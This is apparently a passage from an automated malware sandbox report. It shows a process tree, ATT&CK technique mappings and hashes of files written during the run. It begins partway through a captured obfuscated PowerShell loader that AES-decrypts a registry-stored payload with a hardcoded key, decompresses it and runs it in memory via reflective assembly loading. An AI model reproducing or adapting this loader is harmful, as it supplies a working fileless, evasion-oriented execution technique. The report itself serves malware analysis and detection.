'')('BB1y5kgnvhMTzyDlg3Bj0c/dB10YuoaYBDCLTKv8EKhualjDhi1OXTfulybi45zbTNTObkHj2zRmLrftrv2e81iFkEsq1+pG9UIQCRXtvdWRoPfedw1pOJbjQ4GeCAvx2zPlWg1nEOjsETFk7Nmd1XA+NFO9VuBEYfZQXkjuIAZOFYizKf9MIMaNFdSHuZd+fXjdTasOiKA7Lv0VL7vLRGiejiA44eaK7SjEXsJp32OHhRdWXftjMlaNWB03xs9Pn+l1j9w5LjEiLEtJOLLTNJ+Ojyir0TstsmBARKbkpfTHcTnCxj4DgfWOv286RbLNxO/DcbKDPB+E1JggKlDZsC8srbB/aGuvuNVyZNKw/eyWiAeb9T+8z/yZM9wxdArsIRf8p0OjzhxcR/C50cVo6BYTxxjbfrwzS+4GLpoWof0=');$moUBN = $DcyZX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($moUBN, 0, $moUBN.Length);$moUBN = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($moUBN);$MFjwJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kGv+846IDjBzOTIiBoMe/w==');$MFjwJ = $DcyZX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MFjwJ, 0, $MFjwJ.Length);$MFjwJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MFjwJ);$SIQmn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kFaMXH4bmpmNNyJY8Ol8tA==');$SIQmn = $DcyZX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($SIQmn, 0, $SIQmn.Length);$SIQmn = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($SIQmn);$nsvHR = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7NAUInDEAL3+cKpa4HghZA==');$nsvHR = $DcyZX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nsvHR, 0, $nsvHR.Length);$nsvHR = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nsvHR);$QJlvB = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MO8Z1xJcyFprP+WDNL4xBA==');$QJlvB = $DcyZX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($QJlvB, 0, $QJlvB.Length);$QJlvB = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($QJlvB);$PtLcy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bexHv/LMjaqy7m7x49JQbw==');$PtLcy = $DcyZX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PtLcy, 0, $PtLcy.Length);$PtLcy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PtLcy);$aNyUS0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('I7Cp32L9DXtXjXy4A5ARhQ==');$aNyUS0 = $DcyZX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($aNyUS0, 0, $aNyUS0.Length);$aNyUS0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($aNyUS0);$aNyUS1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dxILbNHaRc730y199ZRJJw==');$aNyUS1 = $DcyZX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($aNyUS1, 0, $aNyUS1.Length);$aNyUS1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($aNyUS1);$aNyUS2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('LQ2YONLhMJq+0xh1DcGnjA==');$aNyUS2 = $DcyZX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($aNyUS2, 0, $aNyUS2.Length);$aNyUS2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($aNyUS2);$aNyUS3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EkKKwZoSX5bCIjN1PaBuiA==');$aNyUS3 = $DcyZX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($aNyUS3, 0, $aNyUS3.Length);$aNyUS3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($aNyUS3);$DcyZX.Dispose();$OpftU1.Dispose();if (@(get-process -ea silentlycontinue $aNyUS3).count -gt 1) {exit};$nnJRx = [Microsoft.Win32.Registry]::$QJlvB.$nsvHR($aNyUS).$SIQmn($wfsGi);$lyUZm=[string[]]$nnJRx.Split('\');$utizI=BQiql(yYtzJ([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($lyUZm[1])));pHXZR $utizI (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$XboCs = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($lyUZm[0]);$OpftU = New-Object System.Security.Cryptography.AesManaged;$OpftU.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OpftU.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OpftU.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Zmazi/Qmi24DGi2+P+vWUx/yIjpkUJoheNseO2lYyOc=');$OpftU.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cv1YiZvlJasFHSTdKR/cTg==');$sTgYj = $OpftU.('rotpyrceDetaerC'[-1..-15] -join '')();$XboCs = $sTgYj.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XboCs, 0, $XboCs.Length);$sTgYj.Dispose();$OpftU.Dispose();$eHgwD = New-Object System.IO.MemoryStream(, $XboCs);$fFGax = New-Object System.IO.MemoryStream;$mIawN = New-Object System.IO.Compression.GZipStream($eHgwD, [IO.Compression.CompressionMode]::$aNyUS1);$mIawN.$PtLcy($fFGax);$mIawN.Dispose();$eHgwD.Dispose();$fFGax.Dispose();$XboCs = $fFGax.ToArray();$GINQn = $moUBN | IEX;$Anshn = $GINQn::$aNyUS2($XboCs);$uAKRn = $Anshn.EntryPoint;$uAKRn.$aNyUS0($null, (, [string[]] ($DAUhI)))
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4280

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3140
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffbdcb29758,0x7ffbdcb29768,0x7ffbdcb29778
  2⤵
  PID:3692
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1812 --field-trial-handle=1848,i,15824989242389649666,7383705917493109633,131072 /prefetch:8
  2⤵
  PID:4452
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2080 --field-trial-handle=1848,i,15824989242389649666,7383705917493109633,131072 /prefetch:8
  2⤵
  PID:4884
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1584 --field-trial-handle=1848,i,15824989242389649666,7383705917493109633,131072 /prefetch:2
  2⤵
  PID:1320
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3000 --field-trial-handle=1848,i,15824989242389649666,7383705917493109633,131072 /prefetch:1
  2⤵
  PID:5032
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2956 --field-trial-handle=1848,i,15824989242389649666,7383705917493109633,131072 /prefetch:1
  2⤵
  PID:4252
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4472 --field-trial-handle=1848,i,15824989242389649666,7383705917493109633,131072 /prefetch:1
  2⤵
  PID:4224
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4444 --field-trial-handle=1848,i,15824989242389649666,7383705917493109633,131072 /prefetch:8
  2⤵
  PID:4444
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4780 --field-trial-handle=1848,i,15824989242389649666,7383705917493109633,131072 /prefetch:8
  2⤵
  PID:2200
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4968 --field-trial-handle=1848,i,15824989242389649666,7383705917493109633,131072 /prefetch:8
  2⤵
  PID:4128
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5040 --field-trial-handle=1848,i,15824989242389649666,7383705917493109633,131072 /prefetch:8
  2⤵
  PID:5076
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=5072 --field-trial-handle=1848,i,15824989242389649666,7383705917493109633,131072 /prefetch:1
  2⤵
  PID:4584
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4968 --field-trial-handle=1848,i,15824989242389649666,7383705917493109633,131072 /prefetch:1
  2⤵
  PID:4804
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=5180 --field-trial-handle=1848,i,15824989242389649666,7383705917493109633,131072 /prefetch:1
  2⤵
  PID:4304
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=5804 --field-trial-handle=1848,i,15824989242389649666,7383705917493109633,131072 /prefetch:1
  2⤵
  PID:1284
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=6024 --field-trial-handle=1848,i,15824989242389649666,7383705917493109633,131072 /prefetch:1
  2⤵
  PID:1656
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4468 --field-trial-handle=1848,i,15824989242389649666,7383705917493109633,131072 /prefetch:8
  2⤵
  PID:4060
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3852 --field-trial-handle=1848,i,15824989242389649666,7383705917493109633,131072 /prefetch:8
  2⤵
  PID:3060
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=4660 --field-trial-handle=1848,i,15824989242389649666,7383705917493109633,131072 /prefetch:1
  2⤵
  PID:3060
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=1508 --field-trial-handle=1848,i,15824989242389649666,7383705917493109633,131072 /prefetch:1
  2⤵
  PID:4572
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=1836 --field-trial-handle=1848,i,15824989242389649666,7383705917493109633,131072 /prefetch:1
  2⤵
  PID:4476
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4524 --field-trial-handle=1848,i,15824989242389649666,7383705917493109633,131072 /prefetch:8
  2⤵
  PID:3796
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4540 --field-trial-handle=1848,i,15824989242389649666,7383705917493109633,131072 /prefetch:8
  2⤵
  PID:4372
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3008 --field-trial-handle=1848,i,15824989242389649666,7383705917493109633,131072 /prefetch:8
  2⤵
  PID:3616
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --mojo-platform-channel-handle=2724 --field-trial-handle=1848,i,15824989242389649666,7383705917493109633,131072 /prefetch:1
  2⤵
  PID:3048
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --mojo-platform-channel-handle=3120 --field-trial-handle=1848,i,15824989242389649666,7383705917493109633,131072 /prefetch:1
  2⤵
  PID:1580
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --mojo-platform-channel-handle=5112 --field-trial-handle=1848,i,15824989242389649666,7383705917493109633,131072 /prefetch:1
  2⤵
  PID:832
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1032 --field-trial-handle=1848,i,15824989242389649666,7383705917493109633,131072 /prefetch:8
  2⤵
  PID:4784
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5260 --field-trial-handle=1848,i,15824989242389649666,7383705917493109633,131072 /prefetch:8
  2⤵
  PID:2904
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --mojo-platform-channel-handle=948 --field-trial-handle=1848,i,15824989242389649666,7383705917493109633,131072 /prefetch:1
  2⤵
  PID:4864
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --mojo-platform-channel-handle=6044 --field-trial-handle=1848,i,15824989242389649666,7383705917493109633,131072 /prefetch:1
  2⤵
  PID:4256

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:2980

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000007

Filesize
57KB

MD5
46423eef1a6786c15b46cf51ad05a70b

SHA1
c8d1f0ba7d863470bc07e86833c0589715922999

SHA256
0bb6cefd27c01dae4eb6981bfd78512187765a0d11f1301a01264c7a4850f95e

SHA512
18c8b88c315a03b55f9a9c799ea1ffc0eddc777bd92b502d854501be95784d474e48ebd142ef9a382ad4d96c745c7b4fc1ac4643657054a6b50419042ed06201

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
2KB

MD5
5eaff8c89e8c60ecea9c951967f79446

SHA1
3e98f712f7ae15a74dce212a2c4150abbe312a16

SHA256
31cc354305b9e9c80ae55103c91f9bcc65caa2c98bc8c5e9873b38076a817067

SHA512
85088b08f735b7a04f019180024e011ff07f45b33eba708c9ffad5978b748b762e9eb75a3dd412a74e8ba516804c9f3e7af15f706afe28f5adc0de2c5f32afbd

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
9deac9dead8ad994e273a8e50e538650

SHA1
5866e8f2d3a37d79b0c6f76d29b0890af1ff9357

SHA256
f8b7a1c8bc5a8fff6fa250a2151c9ef45cf9f3255b5d4a3d46e0860e186ab270

SHA512
105c86db0f5e43a486dcf026879943c72654a03caa243b1c89b91f2a8b57bf10d148bcb9d22b283f2f47fdb2abe0bdcd9292e88d588e3d6fc871ecde89fa96cf

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
2KB

MD5
98e28f0f4869652f548f448d349b18b0

SHA1
1f244055a198e0d3888bc49ffd79dc7a89c146be

SHA256
9bedaf0fd8b6d261b25f93a9bceb728332fe8df5d08ba5118536f916f74a789b

SHA512
60f6977625d810fc339e4ac02d4d9dcea5c1ab5bca91085be5841e956dd7638e255690f423829b462cf5d98875586e61bca34e8031bc9f5a3c877540edc06716

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
2KB

MD5
5d40e31bbeb33bb307666cba8c563bb9

SHA1
0851a84e91d029cdb1ff7ddefbdc40154965df67

SHA256
f008a61ec26759a188010d11c8883718d0af73b6cee12d80a59bfcb2057937eb

SHA512
5299f507ab9c6370520d775f99590ba01f8347f61d42c98e98bdf918340e35c36fb5ec1f0f96b8bd9b857aad9554c381fa49feb08264b759e509370020246996

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
4097e4a8b0c508768c6ef90e2c4a80a9

SHA1
597fd75a38c67267725dfe3cbcf3c70f10420a8c

SHA256
80622c5195410ed46f384893b68a9444f9ba4098ebc5a088e84ee1befaecaadf

SHA512
7bc102a20b8d0edaf6f009d25b032f210409960069b68cbe3101a9272860c01a4e5cef1b6a8de90c9ec99b725ae59035f0f916f5f04f97e831769242d565da39

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
918831fd61b90d062178a79f7f5bd5fc

SHA1
1e32a5a6b99b18f87aa89774c18a810a46413063

SHA256
0055c99030f8ada621aca47c5c895483cdc0fe24e5507d83ef7ad323671f32af

SHA512
fb04254afd8b826439aa5ce8134d49989b8669b59d4395fa4ff10b208eb9e517c025c249a7481295e7b68238297d3f831f2e117dd8953d4c96abd9482e4cb491

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
7KB

MD5
949b417bf09b037f0b8dc0ad8cc8c31c

SHA1
4c97585c3bd5c2f2285167db0cbd772652d9f3d1

SHA256
2da30c1419177210f3f2fec0721af793c01ace5cd7078e8064b0df47029baf87

SHA512
efd52a6a131b8adb263259badb64c664aabdccca3bfec1a9bdadeaf35818b76b18a28ac87ec752fecb29771cbfa5df37becc8097997ff0b0bf93be0a14126ac0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
5469ced752520ee33fac80e8eb213070

SHA1
e8d4aaef1812c083e52ec635baa90c36cf2c1a63

SHA256
6596b4fac320cf27e2e852050705d12a1bcd000306b8e52af99449a3fe661cad

SHA512
fbdc2432e906c0480ce547f73895de99d79f54f10f27d0964390c89b8dda72d37089626f4cb9ca46b462095c2832536106912e181a195ca51fdfa88e3827a34c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
a36f4a745c7ad96912b545e5243d1096

SHA1
d31dac6799ef96c3bc61f39a5ec1a0a53d7639de

SHA256
71e8c475006d0104bc8bda39e14aa5eccaa334d9a95e3110727dfeac72c91a8c

SHA512
c5f07d721d725833f79b9e7b3298886be5b337758848405e14bd2a8651379c040a195f44bb454246d38fec5033e5bffb186e01532144ebbf38dcefd3e09a1c18

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
56B

MD5
ae1bccd6831ebfe5ad03b482ee266e4f

SHA1
01f4179f48f1af383b275d7ee338dd160b6f558a

SHA256
1b11047e738f76c94c9d15ee981ec46b286a54def1a7852ca1ade7f908988649

SHA512
baf7ff6747f30e542c254f46a9678b9dbf42312933962c391b79eca6fcb615e4ba9283c00f554d6021e594f18c087899bc9b5362c41c0d6f862bba7fb9f83038

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt~RFe595654.TMP

Filesize
120B

MD5
2ad08cd0bd6254b484b63d7006a1964c

SHA1
bebf3a3422bc8273ad1a46be156fd4099d7e6ff0

SHA256
2c0618366d82ce65bec99ea312272a89c7694deacfb67a94b4be6c8783842ce0

SHA512
746bca5d820ed12126e6c8100fdaefbdb0764cd52cb353aa6b5dbc4036568fd4d72406f9d7e305ba51936bad9b5bb4456923919577eba9b7f33fd820f062165b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
218KB

MD5
797dbe43d3ef2358e4577f7c92c0810a

SHA1
4164bc819e149221d7892338cbcb26a0e13db87f

SHA256
576d1127c1c73fe740f4bbefd673ecbc6b0731c147e9e81f0e9d349b73519b02

SHA512
47b1ca7252016db5d75818cf319e0674523fe0136eb5a50c6f6cf975d273d78b8d3d488c78434b73ab2dd3b44e5b634d92e74d63d7ecf7f1c2e132dff36e8a53

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
218KB

MD5
04d7005b8dc1360c6ec6a6cdeccaafba

SHA1
3c8d593052030c94937f0b7152d4168cd35d101e

SHA256
17fc9e50261e26a2917a52e4fa7ce8c44b84277bddbd1df0e46be3b8bfaa6136

SHA512
9f9f0c70001b5b149a3cf7ba8462249fdf1500e09b22ed7169f5c2f8acdbf915f2d17b3a8c32f35bf492be6fb201e1f1b7b60bd5095a192e713bb1964d338b1b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
218KB

MD5
9149e2ae77ab426b340c6451143c248a

SHA1
a551d88d9610ef7b4407e9599f3400761eae354b

SHA256
cbe3004a2f096dc39a21ef7061fdf55c4e207dba5df0200836983963c1b4e38f

SHA512
455408e50b27df90482300f3c3fe788fbf2e008a5bce0eeba61dffec10d049a0f6f90a187451ffe166a669611529f07026fa8179358efdd9464ffafd3a0b8fe8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
218KB

MD5
72574f0da30507edab1e21536a4006a5

SHA1
6bef58b5d8689a13da0b6a3320b8ae80f1f8e2cd

SHA256
e81fde7ecb1875ba2ec258542f33a089d54aad82f74cf4feec9894bc05c11fa6

SHA512
a9f147b756b63d27a676de8ac2bf7dcbe122e35ef56991fc0df269770dc3ff365f787794372c6db3bbda5dbd697bc44f7db29920d4b73947ec28f89115e3f044

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

Filesize
102KB

MD5
2104190eee2dc639e64df14840b6f84d

SHA1
2c35ae1462db83f6c2a51cc5f158be0a8c1f884e

SHA256
6b931c9ef4d0a37c7b595ffc640bb51816a17917fb7ffc085f1f3b7c1ec03333

SHA512
b12603be5dbf78b29aa4e32d04dd65694f53a4a6b1beab1a3e54d05c93db8cde70176eb60ed8849aea3549a40f020ba1966dc01edfbfc941501587cd8bcb1dac

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe5974c9.TMP

Filesize
98KB

MD5
d4c4733a59e22b244b870fbad8788de5

SHA1
8914b18122ce42b2858e64f2aacbb298d94d9bce

SHA256
a08f674925e4ee6eefe22be65729ed6f6fc59df382200babeb6b55148e5d4889

SHA512
4a5db33505739ac7c11d893215faae973be1283ef70680816f9b160dba791eb4043544b8e52bd64109784d5e6449d18b2c94b65424d423a01163957a9db19394

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
